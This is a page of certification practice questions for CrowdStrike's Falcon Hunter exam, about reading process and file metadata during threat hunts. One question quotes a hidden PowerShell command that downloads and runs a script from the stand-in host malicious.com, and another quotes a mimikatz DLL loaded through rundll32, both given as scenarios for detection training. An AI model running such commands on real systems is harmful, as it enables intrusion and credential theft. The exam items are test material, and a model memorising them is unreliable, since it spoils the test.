
CrowdStrikeCertified Falcon Hunter (CCFH)
Domain 3Objective 1
3.1 Analyze and Interpret Metadata Around Files and Processes Recorded by Falcon CCFH Practice Questions (Page 1)
Part of the Search and Investigation Tools domain, which makes up ~12% of our current practice bank.
19questions here
4free pages
4concepts
Questions 1–5
- 1
A Falcon investigator is examining a process event for 'powershell.exe'. The command line is 'powershell.exe -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://malicious.com/a.ps1')"'. The parent process is 'wscript.exe'. Which process metadata field would be MOST useful to determine the initial infection vector?
Select an answer first - 2
A threat hunter is looking for signs of credential dumping. They see a process 'lsass.exe' with a child process 'rundll32.exe'. The command line of rundll32.exe is 'rundll32.exe C:\Users\Public\mimikatz.dll,EntryPoint'. The user context of lsass.exe is 'SYSTEM'. The user context of rundll32.exe is 'SYSTEM'. Which metadata field is MOST critical to confirm this is credential dumping?
Select an answer first - 3
A Falcon event shows that a file named 'invoice.exe' was created in a user's Downloads folder and then executed. Which metadata fields, when combined, best confirm this execution sequence?
Select an answer first - 4
An analyst is investigating a file 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\update.exe'. The file's creation timestamp is 2023-06-01 08:00:00 UTC. The file's last-write timestamp is 2023-06-01 08:00:10 UTC. A process event for 'update.exe' shows a start timestamp of 2023-06-01 08:00:15 UTC. Which metadata correlation is MOST suspicious?
Select an answer first - 5
In Falcon, which file metadata field would you examine to determine the full directory location where a file was executed from?
Select an answer first
Finished these 5 questions?
Review the revealed explanations, or continue through the curriculum.
Free Basic Practice is a study aid with revealable answers — not a scored exam. Examers.io is independent and not affiliated with or endorsed by CrowdStrike. “CCFH” is a trademark of its owner, used for identification only.